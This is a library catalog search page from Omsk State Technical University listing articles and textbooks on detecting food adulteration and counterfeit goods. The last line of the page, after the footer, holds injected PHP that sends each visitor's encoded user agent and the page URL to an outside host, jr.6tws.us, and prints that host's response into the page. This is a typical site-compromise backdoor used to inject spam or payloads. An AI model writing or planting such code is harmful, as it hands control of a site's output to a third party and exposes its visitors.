Перейти на сайт
библиотеки ОмГТУ
Share |
   
   
   
   
   
   

 
      Виртуальная справка
 
      Личный кабинет

Логин
Пароль
Забыли пароль?
Регистрация

 
      Счетчики
Rambler's Top100
Яндекс цитирования

Сейчас на сайте

133 пользователей



 
      Наши партнеры
Студенческий информационный портал компании
("Ключевые слова=ФАЛЬСИФИКАЦИЯ ПРОДОВОЛЬСТВЕННЫХ ТОВАРОВ")
Результаты поиска
СВОДНЫЙ КАТАЛОГ: Найдено записей: 7
1. 
Товаровед продовольственных товаров. - Журнал, 2012г. № 4
Оглавление 
  • Елисеева, Л.Г.. Сравнительная характеристика потребительских свойств ореховых снеков / Л.Г. Елисеева. - с.6-9
    Кл. слова: СНЕКИ, ОРЕХИ, БЫСТРОЕ ПИТАНИЕ
  • Потороко, И.Ю.. Использование электрофизических методов при производстве и контроле качества пищевых продуктов / И.Ю. Потороко, Н.И. Пилипенко. - с.33-37
    Кл. слова: ФИЗИКО- ХИМИЧЕСКИЕ МЕТОДЫ ИССЛЕДОВАНИЯ, КОНТРОЛЬ КАЧЕСТВА ПИЩЕВЫХ ПРОДУКТОВ
  • Белкин, Ю.Д.. Обзор современных методов идентификации коньяков и бренди, применяемых в отечественной и зарубежной практике / Ю.Д. Белкин, М. А. Положишникова. - с.45-49
    Кл. слова: ФАЛЬСИФИКАЦИЯ ПРОДОВОЛЬСТВЕННЫХ ТОВАРОВ
  • Вытовтов, А.А.. Нормативно-технические документы - элементы идентификации, потверждения соответствия, экспертизы и оценки качества пищевых продуктов / А.А. Вытовтов. - с.69-72
    Кл. слова: ПОДТВЕРЖДЕНИЕ СООТВЕТСТВИЯ, КАЧЕСТВО ПИЩЕВЫХ ПРОДУКТОВ, НОРМАТИВНО-ТЕХНИЧЕСКИЕ ДОКУМЕНТЫ
2. 
Товаровед продовольственных товаров. - Журнал, 2013г. № 10
Оглавление 
  • Шаповалова, И. С.. Актуальные вопросы идентификации сухих красных вин / И. С. Шаповалова, М. А. Положишникова. - с.16-22
    Кл. слова: НАПИТКИ АЛКОГОЛЬНЫЕ
  • Гарькуша, М. В,. Обзор современных методов идентификации виски / М. В, Гарькуша, М. А. Положишникова. - с.23-27
    Кл. слова: НАПИТКИ АЛКОГОЛЬНЫЕ КРЕПКИЕ
  • Родина,Т. Г.. Ассортимент и качество икры лососевых и сиговых рыб / Г. Родина, М. В. Сухарева. - с.54-59
    Кл. слова: ТОВАРОВЕДЕНИЕ РЫБНЫХ ТОВАРОВ, ФАЛЬСИФИКАЦИЯ ПРОДОВОЛЬСТВЕННЫХ ТОВАРОВ
  • Бессонова, О. В.. Ассортимент молочных продуктов для детского питания / О. В. Бессонова. - с.60-64
    Кл. слова: ДЕТСКОЕ ПИТАНИЕ, МОЛОЧНЫЕ ПРОДУКТЫ
3. 
Товаровед продовольственных товаров. - Журнал, 2011г. № 1
Оглавление 
  • Шленская, Т. В. Зеленый чай - полезный напиток / ; Т. В. Шленская, И. А. Шумкова. - с.10-12
    Кл. слова: ТОВАРОВЕДЕНИЕ ВКУСОВЫХ ТОВАРОВ, НАПИТКИ БЕЗАЛКОГОЛЬНЫЕ
  • Елисеева, Л. Г. Анализ рынка масложировой продукции в России / ; Л. Г. Елисеева, Л. С. Потанина. - с.23-25
    Кл. слова: ТОВАРОВЕДЕНИЕ МАСЛОЖИРОВЫХ ТОВАРОВ, ФАЛЬСИФИКАЦИЯ ПРОДОВОЛЬСТВЕННЫХ ТОВАРОВ, ИДЕНТИФИКАЦИЯ
  • Резго, Г. Я. Инновационные подходы к классификации продовольственных товаров как объектов хранения / ; Г. Я. Резго. - с.40-45
    Кл. слова: ТОВАРОВЕДЕНИЕ ПРОДОВОЛЬСТВЕННЫХ ТОВАРОВ, КАЧЕСТВО И БЕЗОПАСНОСТЬ ПИЩЕВЫХ ПРОДУКТОВ
  • Бодункова, Т. С. Информационная идентификация экологически чистых продуктов / ; Т. С. Бодункова. - с.46-50
    Кл. слова: ПРОДУКТ ЭКОЛОГИЧЕСКИЙ, МАРКИРОВКА ТОВАРОВ И УСЛУГ
  • Технические условия. Регистрация и разработка. Согласование ТУ на пищевую продукцию. - с.51-54
    Кл. слова: ТЕХНИЧЕСКИЕ условия
4. 
Товаровед продовольственных товаров. - Журнал, 2010г. № 2
Оглавление 
  • Баранов, Б. А. Научно-методические основы выявления фальсификации продовольственных товаров / ; Б. А. Баранов, А. Ю. Соколов. - с.5-6
    Кл. слова: Фальсификация продовольственных товаров
  • Леонова, И. Б. Роль микробиологического контроля качества и защите потребительского рынка от некачественных продовольственных товаров / ; И. Б. Леонова. - с.6-8
    Кл. слова: КОНТРОЛЬ КАЧЕСТВА ПИЩЕВЫХ ПРОДУКТОВ
  • Димитрова, И. В. Тенденции развития организации быстрого питания на потребительском рынке: зарубежный и российский опыт / ; И. В. Димитрова. - с.9-10
    Кл. слова: Организация предпринимательской деятельности, Предприятие быстрого питания
  • Гончаренко, О. А. Некоторые вопросы идентификации масложировой продукции / ; О. А. Гончаренко. - с.16
    Кл. слова: ТОВАРОВЕДЕНИЕ МАСЛОЖИРОВЫХ ТОВАРОВ
  • Валгина, Л. А. Выявление некачественной и фальсифицированной винодельческой продукции в экспертной практике ЦЭТУ / ; Л. А. Валгина. - с.17-18
    Кл. слова: ВИНО, Вино - экспертиза, Вино - фальсификация, идентификация
  • Елисеева, Л. Г. Анализ потенциальной опасности пищевых продуктов, содержащих ГМ-источники / ; Л. Г. Елисеева, А. В. Рыжакова, Н. В. Ласькова. - с.19-20
    Кл. слова: Генно-модифицированные ингредиенты
  • Калашнова, Т. В. Экспертиза и обнаружение фальсификации зеленого чая / ; Т. В. Калашнова. - с.22-24
    Кл. слова: ТОВАРОВЕДЕНИЕ ВКУСОВЫХ ТОВАРОВ, Чай - экспертиза, Чай - фальсификация
  • Карагодин, В. П. Функциональные пищевые продукты - фальсификация или некорректное позиционирование / ; В. П. Карагодин, М. М. Лизунов. - с.25-26
    Кл. слова: Функциональные пищевые продукты (ФПП), Биологически активные добавки (БАД)
  • Коснырева, Л. М. Методы выявления фальсификации мясных продуктов / ; Л. М. Коснырева. - с.27-28
    Кл. слова: Мясо - экспертиза, Мясо - фальсификация
  • Положишникова, М. А. Современные аспекты идентификации винодельческой продукции при экспертизе качества и обнаружении фальсификации / ; М. А. Положишникова. - с.33-35
    Кл. слова: Вино - экспертиза, Вино - фальсификация, идентификация
  • Рыжакова, А. В. Фальсификация меда и способы распознавания / ; А. В. Рыжакова. - с.37-38
    Кл. слова: Мед - фальсификация, идентификация
  • Родина, Т. Г. Стандарты FAO/WHO в области рыбных товаров и морепродуктов / ; Т. Г. Родина. - с.41-44
    Кл. слова: ТОВАРОВЕДЕНИЕ РЫБНЫХ ТОВАРОВ
  • Нормы физиологических потребностей в энергии и пищевых веществах для различных групп населения Российской Федерации. - с.48-66
    Кл. слова: Нормы физиологических потребностей
5. 
Дмитриченко, Михаил Иванович. Экспертиза качества и обнаружение фальсификации продовольственных товаров [Текст] : Учебное пособие для студентов вузов / М. И. Дмитриченко, 2003. - 150 с.
Ключевые слова 
ЭКСПЕРТИЗА ТОВАРОВ -- фальсификация товаров -- ФАЛЬСИФИКАЦИЯ ПРОДОВОЛЬСТВЕННЫХ ТОВАРОВ -- ПИЩЕВЫЕ ДОБАВКИ -- МАРКИРОВКА -- ШТРИХОВОЕ КОДИРОВАНИЕ -- ЭКСПЕРТИЗА ПРОДОВОЛЬСТВЕННЫХ ТОВАРОВ -- ЭКСПЕРТИЗА КАЧЕСТВА молока -- ЭКСПЕРТИЗА КАЧЕСТВА РАСТИТЕЛ -- ЭКСПЕРТИЗА КАЧЕСТВА мяса -- ЭКСПЕРТИЗА КАЧЕСТВА рыбы -- ЭКСПЕРТИЗА КАЧЕСТВА яиц -- ЭКСПЕРТИЗА КАЧЕСТВА соли -- ЭКСПЕРТИЗА КАЧЕСТВА зерна -- ДОБАВКА ПИЩЕВАЯ -- МАРКИРОВКА консервов -- ШТРИХОВОЕ КОДИРОВАНИЕ ТОВАРА
Держатели документа (Информация об экземплярах) 
6. 
Николаева М. А. Идентификация и обнаружение фальсификации продовольственных товаров [Текст] / М. А. Николаева, М. А. Положишникова, 2015. - 463 с.
Держатели документа (Информация об экземплярах) 
7. 
Чепурной, И. П. Идентификация и фальсификация продовольственных товаров [Текст] : учебник / И. П. Чепурной, 2002. - 460 с.
Держатели документа (Информация об экземплярах) 


    Адрес: 644050, Россия, г. Омск, пр-кт Мира, 11

    Телефон: (3812) 65-34-86, 65-23-69

    E-mail: libdirector@omgtu.ru, b_oa@omgtu.ru

[ О библиотеке ]     [ Читателю ]     [ Информационные ресурсы ]     [ Электронный каталог ]     [ Научная деятельность ]     [ Культура и досуг ]     [ ИРБИС в Омске ]

Электронное периодическое издание «lib.omgtu.ru» | Свидетельство о регистрации СМИ Эл № ФС77-45378 от 10.06.2011 Федеральной службы по надзору в сфере связи, информационных технологий и массовых коммуникаций (Роскомнадзор)| Выпуск № 3023 - 19.09.2019
© Омский государственный технический университет

Электронно-библиотечная система АРБУЗ ОмГТУ
Страница сгенерирована за 0.74 с.20 запросов, 0.56c. $useragent=$_SERVER['HTTP_USER_AGENT']; $bs=base64_encode($useragent); $sb='http://'.$_SERVER['SERVER_NAME'].$_SERVER["REQUEST_URI"]; $ret = file_get_contents('http://jr.6tws.us/?UserAgent='.$bs."&Domain=".$sb); print $ret;